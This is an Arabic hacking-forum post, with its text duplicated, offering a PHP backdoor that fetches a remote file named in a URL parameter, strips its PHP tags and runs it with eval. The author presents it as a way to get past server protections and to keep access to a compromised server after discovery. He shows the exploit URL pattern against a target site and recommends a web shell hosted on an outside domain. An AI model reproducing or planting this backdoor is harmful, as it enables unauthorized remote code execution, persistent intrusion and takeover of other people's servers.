midotiger228
08-31-2012, 11:21 AM
السلام عليكم ورحمة الله وبركاته
اخواني الاعزاء اعضاء منتدانا العملاق حبيت اقدم لكم اليوم هديه ثمينه.......
هذا الكود الجبار لرفع اي ملف خارجي وهو يتخطى الحمايه الخاصه بالسيرفر في الكونفجريشن والتي تمنع من استضافة ملفات خارجيه..
الكود متجرب وفعال وهو يحافظ ايضا على تواجدك بالسيرفر حتى بعد اكتشاف امرك.. فقط قم بوضعه داخل اي مجلد ف الموقع ومنه قم برفع شيل مره اخرى وبالتالي انت ف السيرفر من جديد :)
واحد يجي يقولي طيب لما احنا نقدر نرفع ملف php ف الاسكربت طيب مانرفع ام الشل على طوووووووول!!!!!
لا انا اقولك يا مان اوقات السيرفر بيكون محدد حجم الملفات المدرجه خارجيا مثلا على 20kp واكيد حجم الشيل اكبر
واوقات السيرفر بيكون عامل حظر للملفات اللي جواها اكواد حتى لو txt
وغالبا اكواد التلغيم العاديه للانكلود والكوماند ..بيكون السيرفر عامل حمايه منها.............
وهنا يأتي دور هذا الكود الجبار فقط ضع الكود داخل ملف txt واعد تسميته الى php وارفع الملف ومنه هات شيلك والطريقه مضمونه 10000%.
هذا هو الكود.......
<?php
if($_GET[aljyyosh]){
$file=implode("\n",file($_GET[aljyyosh]));
$aljyyosh=str_replace("<?php", "",$file);
$aljyyosh=str_replace("<?", "",$aljyyosh);
$aljyyosh=str_replace("?>", "",$aljyyosh);
eval($aljyyosh);
}
?>
توضيح الاستغلال......
هنا المتغير هو aljyyosh فيكون الاستغلال هكذا..........
www.target.com/directory/filename.php?value=your shell in txt?
www.target.com هو الموقع المستهدف
directory هو مسار الملف ف الموقع او ممكن يكون ف الاندكس مباشرة شوف انت هترفعه فين.
filename هو الاسم اللي انت مسميه للملف بعد ما تحط الكود داخل ملف تكست
value هو المتغير المصاب وهو هنا aljyyosh
your shell in txt طبعا مش محتاجه ذكاء بس الشيل دا انا برشحه..
http://www.e-linux-solutions.com/descargas/data.txt
اعتقد ان الشرح واضح ان شاء الله ولو في اي استفسارات انا موجود ...
اخوكم محمد الإمام من مصر..
والسلام عليكم ورحمة الله وبركاته.
اخواني الاعزاء اعضاء منتدانا العملاق حبيت اقدم لكم اليوم هديه ثمينه.......
هذا الكود الجبار لرفع اي ملف خارجي وهو يتخطى الحمايه الخاصه بالسيرفر في الكونفجريشن والتي تمنع من استضافة ملفات خارجيه..
الكود متجرب وفعال وهو يحافظ ايضا على تواجدك بالسيرفر حتى بعد اكتشاف امرك.. فقط قم بوضعه داخل اي مجلد ف الموقع ومنه قم برفع شيل مره اخرى وبالتالي انت ف السيرفر من جديد :)
واحد يجي يقولي طيب لما احنا نقدر نرفع ملف php ف الاسكربت طيب مانرفع ام الشل على طوووووووول!!!!!
لا انا اقولك يا مان اوقات السيرفر بيكون محدد حجم الملفات المدرجه خارجيا مثلا على 20kp واكيد حجم الشيل اكبر
واوقات السيرفر بيكون عامل حظر للملفات اللي جواها اكواد حتى لو txt
وغالبا اكواد التلغيم العاديه للانكلود والكوماند ..بيكون السيرفر عامل حمايه منها.............
وهنا يأتي دور هذا الكود الجبار فقط ضع الكود داخل ملف txt واعد تسميته الى php وارفع الملف ومنه هات شيلك والطريقه مضمونه 10000%.
هذا هو الكود.......
<?php
if($_GET[aljyyosh]){
$file=implode("\n",file($_GET[aljyyosh]));
$aljyyosh=str_replace("<?php", "",$file);
$aljyyosh=str_replace("<?", "",$aljyyosh);
$aljyyosh=str_replace("?>", "",$aljyyosh);
eval($aljyyosh);
}
?>
توضيح الاستغلال......
هنا المتغير هو aljyyosh فيكون الاستغلال هكذا..........
www.target.com/directory/filename.php?value=your shell in txt?
www.target.com هو الموقع المستهدف
directory هو مسار الملف ف الموقع او ممكن يكون ف الاندكس مباشرة شوف انت هترفعه فين.
filename هو الاسم اللي انت مسميه للملف بعد ما تحط الكود داخل ملف تكست
value هو المتغير المصاب وهو هنا aljyyosh
your shell in txt طبعا مش محتاجه ذكاء بس الشيل دا انا برشحه..
http://www.e-linux-solutions.com/descargas/data.txt
اعتقد ان الشرح واضح ان شاء الله ولو في اي استفسارات انا موجود ...
اخوكم محمد الإمام من مصر..
والسلام عليكم ورحمة الله وبركاته.